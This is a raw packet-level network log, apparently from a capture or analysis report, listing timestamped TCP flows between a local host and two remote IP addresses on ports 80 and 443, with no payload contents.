Nov 5, 2024 18:46:10.575292110 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.575326920 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.575328112 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.575336933 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.575349092 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.575354099 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.575359106 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.575385094 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.575395107 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.575404882 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.575412989 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.575433016 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.575440884 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.575452089 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.575480938 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.575629950 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.575645924 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.575656891 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.575666904 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.575678110 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.575680017 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.575686932 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.575697899 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.575706959 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.575714111 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.575721025 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.575745106 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.575774908 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.575784922 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.575795889 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.575819016 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.575828075 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.575855970 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.575865984 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.575881004 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.575890064 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.575891972 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.575916052 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.575941086 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.575946093 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.575958967 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.575968981 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.575978994 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.575979948 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.575988054 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.576005936 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.576020956 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.576556921 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.576566935 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.576577902 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.576603889 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.576634884 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.576646090 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.576661110 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.576670885 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.576680899 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.576692104 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.576702118 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.576719999 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.576730013 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.576730013 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.576740980 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.576771975 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.576780081 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.576832056 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.576843977 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.576854944 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.576865911 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.576875925 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.576877117 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.576880932 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.576901913 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.576913118 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.576931000 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.576936007 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.576946020 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.576961040 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.576982021 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.577060938 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.577075005 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.577085972 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.577095032 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.577106953 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.577110052 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.577117920 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.577137947 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.577157974 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.577215910 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.577225924 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.577235937 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.577246904 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.577249050 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.577256918 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.577279091 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.577327013 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.577368975 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.577379942 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.577390909 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.577402115 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.577409983 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.577413082 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.577423096 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.577429056 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.577430010 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.577450037 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.577454090 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.577462912 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.577469110 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.577488899 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.577507973 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.577541113 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.577553034 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.577563047 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.577575922 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.577589989 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.577652931 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.577665091 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.577676058 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.577685118 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.577699900 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.577729940 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.577783108 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.577817917 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.577827930 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.577852964 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.577883959 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.577900887 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.577928066 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.577939987 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.577950954 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.577956915 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.577972889 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.577997923 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.578068972 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.578080893 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.578119993 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.578147888 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.578157902 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.578167915 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.578190088 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.578212023 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.578267097 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.578279972 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.578289986 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.578301907 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.578313112 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.578318119 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.578331947 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.578360081 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.578434944 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.578447104 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.578458071 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.578469038 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.578479052 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.578483105 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.578514099 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.578686953 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.578697920 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.578707933 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.578727961 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.578759909 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.590768099 CET	443	49820	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:10.590787888 CET	443	49820	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:10.590823889 CET	443	49820	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:10.590837955 CET	49820	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:10.590867043 CET	49820	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:10.591002941 CET	49820	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:10.591015100 CET	443	49820	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:10.591023922 CET	49820	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:10.591027975 CET	443	49820	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:10.594249010 CET	49825	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:10.594271898 CET	443	49825	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:10.594341040 CET	49825	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:10.594537973 CET	49825	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:10.594551086 CET	443	49825	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:10.607747078 CET	443	49821	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:10.607795954 CET	443	49821	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:10.607850075 CET	49821	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:10.607861042 CET	443	49821	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:10.607986927 CET	49821	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:10.607986927 CET	49821	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:10.607995033 CET	443	49821	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:10.608097076 CET	443	49821	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:10.610543966 CET	49826	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:10.610580921 CET	443	49826	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:10.610632896 CET	49826	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:10.610809088 CET	49826	443	192.168.2.4	13.107.246.45
Nov 5, 2024 18:46:10.610821962 CET	443	49826	13.107.246.45	192.168.2.4
Nov 5, 2024 18:46:10.617804050 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.617825985 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.617840052 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.617849112 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.617871046 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.617887974 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.660325050 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.660336018 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.660345078 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.660384893 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.666529894 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.666539907 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.666554928 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.666565895 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.666575909 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.666579008 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.666620016 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.666866064 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.667023897 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.667068958 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.667073965 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.667088985 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.667110920 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.667115927 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.667126894 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.667135954 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.667140961 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.667146921 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.667169094 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.667197943 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.667290926 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.667404890 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.667452097 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.667913914 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.667924881 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.667939901 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.667960882 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.667987108 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.667987108 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.668001890 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.668013096 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.668023109 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.668046951 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.668056965 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.668171883 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.668183088 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.668195009 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.668210983 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.668220997 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.668221951 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.668231964 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.668234110 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.668247938 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.668257952 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.668267965 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.668268919 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.668293953 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.668313026 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.668378115 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.668389082 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.668397903 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.668407917 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.668416977 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.668420076 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.668426991 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.668440104 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.668473959 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.668492079 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.668504000 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.668514967 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.668524981 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.668535948 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.668545008 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.668556929 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.668565989 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.668569088 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.668600082 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.668602943 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.668613911 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.668620110 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.668625116 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.668644905 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.668654919 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.668756962 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.668771982 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.668782949 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.668793917 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.668813944 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.668827057 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.668939114 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.668982029 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.669205904 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.669222116 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.669231892 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.669241905 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.669254065 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.669259071 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.669298887 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.669337988 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.669347048 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.669356108 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.669370890 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.669379950 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.669379950 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.669394016 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.669416904 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.669430971 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.669445038 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.669564009 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.669609070 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.669657946 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.669676065 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.669698000 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.669728041 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.679343939 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.679354906 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.679363966 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.679420948 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.679426908 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.679436922 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.679447889 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.679457903 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.679466009 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.679476976 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.679486990 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.679487944 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.679511070 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.679527044 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.679529905 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.679539919 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.679550886 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.679562092 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.679569006 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.679569006 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.679589987 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.679599047 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.679614067 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.679625034 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.679646015 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.679662943 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.679709911 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.679722071 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.679730892 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.679740906 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.679753065 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.679783106 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.679861069 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.679873943 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.679884911 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.679896116 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.679918051 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.679929018 CET	80	49804	31.41.244.11	192.168.2.4
